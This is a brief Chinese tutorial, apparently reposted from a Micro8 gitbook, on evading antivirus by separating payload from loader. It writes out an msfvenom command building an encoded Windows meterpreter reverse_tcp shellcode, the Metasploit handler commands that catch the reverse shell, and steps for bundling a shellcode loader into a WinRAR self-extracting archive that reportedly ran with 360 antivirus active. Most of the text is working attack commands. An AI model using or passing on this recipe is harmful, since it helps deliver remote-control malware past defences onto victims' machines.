payload分离免杀实验

原文链接:https://micro8.gitbook.io/micro8/contents-1/41-50/47payload-fen-li-mian-sha-si-lu

生成shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.78.1 lport=8888 -e x86/shikata_ga_nai -i 5 -f raw > test.bin

msf监听端口

1
2
3
4
5
6
7
8
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set playload windows/meterpreter/reverse_tcp
playload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > exploit

测试效果

1. 下载 github 上的shellcode加载器,把加载器和shellcode用WinRar打包成自解压文件;
2. 在 WinXP 虚拟机中运行;
3. 在开启360的情况下,正常运行,效果如下:
67868500.png
67916687.png